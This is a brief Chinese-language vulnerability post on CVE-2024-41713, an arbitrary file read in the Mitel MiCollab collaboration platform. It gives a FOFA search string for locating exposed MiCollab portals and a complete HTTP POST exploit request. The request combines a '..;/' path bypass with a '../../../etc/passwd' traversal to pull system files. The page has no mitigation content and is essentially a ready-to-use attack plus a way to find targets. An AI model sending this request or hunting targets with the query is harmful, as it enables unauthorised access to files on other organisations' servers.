登录 白背景

Mitel MiCollab 企业协作平台存在任意文件读取漏洞(CVE-2024-41713)

一、漏洞简介

Mitel MiCollab 企业协作平台存在任意文件读取漏洞(CVE-2024-41713)

二、影响版本

  • Mitel MiCollab

三、资产测绘

  • fofabody="MiCollab End User Portal"
  • 特征

1733726926253-8a2ad3bc-1ed3-4351-a1c9-d29baba2cd4d.png

四、漏洞复现

POST /npm-pwg/..;/ReconcileWizard/reconcilewizard/sc/IDACall?isc_rpc=1&isc_v=&isc_tnum=2 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Content-Type: application/x-www-form-urlencoded

_transaction=<transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchema-instance" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">2</transactionNum><operations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><criteria xsi:type="xsd:Object"><reportName>../../../etc/passwd</reportName></criteria><operationConfig xsi:type="xsd:Object"><dataSource>summary_reports</dataSource><operationType>fetch</operationType></operationConfig><appID>builtinApplication</appID><operation>downloadReport</operation><oldValues xsi:type="xsd:Object"><reportName>x.txt</reportName></oldValues></elem></operations><jscallback>x</jscallback></transaction>&protocolVersion=1.0&__iframeTarget__=x

1733726939722-349357af-bb55-4a5b-a79c-f34859603858.png

原文: https://www.yuque.com/xiaokp7/ocvun2/lu6evifftgz671yy